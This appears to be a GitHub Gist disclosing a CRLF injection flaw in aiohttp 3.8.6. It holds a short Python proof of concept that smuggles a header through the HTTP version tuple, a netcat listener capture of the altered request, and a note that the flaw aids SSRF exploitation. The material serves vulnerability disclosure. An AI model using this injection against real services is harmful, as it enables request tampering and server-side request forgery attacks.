-
-
Save jnovikov/184afb593d9c2114d77f508e0ccd508e to your computer and use it in GitHub Desktop.
aiohttp CRLF injection via Version
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import aiohttp | |
import asyncio | |
async def main(): | |
async with aiohttp.ClientSession(version=("1.1", "\r\nPwnedBy: jnovikov"), headers={'connection': 'Close'}) as session: | |
async with session.get('http://localhost:5000') as response: | |
print(response.status) | |
print(await response.text()) | |
asyncio.run(main()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nc -l 5000 | |
GET / HTTP/1.1. | |
PwnedBy: jnovikov | |
Host: localhost:5000 | |
Connection: Close | |
Accept: */* | |
Accept-Encoding: gzip, deflate | |
User-Agent: Python/3.11 aiohttp/3.8.6 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Current aiohttp version (3.8.6) is vulnerable to CRLF injection if attacker can control the HTTP version specified for the request.
If the attacker can specify custom array (from JSON for example), validation won't be triggered and attacker would be able to change the request (headers).
This can help with the exploitation of various SSRF vulnerabilites.